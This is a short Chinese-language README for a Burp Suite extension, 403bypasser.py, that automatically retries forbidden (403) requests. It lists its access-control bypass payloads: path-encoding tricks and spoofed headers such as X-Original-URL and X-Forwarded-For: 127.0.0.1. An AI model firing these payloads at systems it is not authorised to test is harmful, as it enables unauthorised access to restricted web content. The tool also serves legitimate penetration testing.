绕过 403 受限目录的 burpsuite 扩展。通过使用 PassiveScan(默认启用),这个扩展会自动扫描每个 403 请求,所以只需添加到 burpsuite 并享受。
有效负载:$1:HOSTNAME $2:PATH
$1/$2 $1/%2e/$2 $1/$2/. $1//$2// $1/./$2/./ $1/$2anything -H "X-Original-URL: /$2" $1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1" $1 -H "X-Rewrite-URL: /$2" $1/$2 -H "Referer: /$2" $1/$2 -H "X-Originating-IP: 127.0.0.1" $1/$2 -H "X-Forwarded-For: 127.0.0.1" $1/$2 -H "X-Remote-IP: 127.0.0.1" $1/$2 -H "X-Client-IP: 127.0.0.1" $1/$2 -H "X-Host: 127.0.0.1" $1/$2 -H "X-Forwarded-Host: 127.0.0.1" $1/$2%20/ $1/%20$2%20/ $1/$2? $1/$2??? $1/$2// $1/$2/ $1/$2/.randomstring $1/$2..;/
感谢@lohubi贡献了许多有效载荷。
BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Finish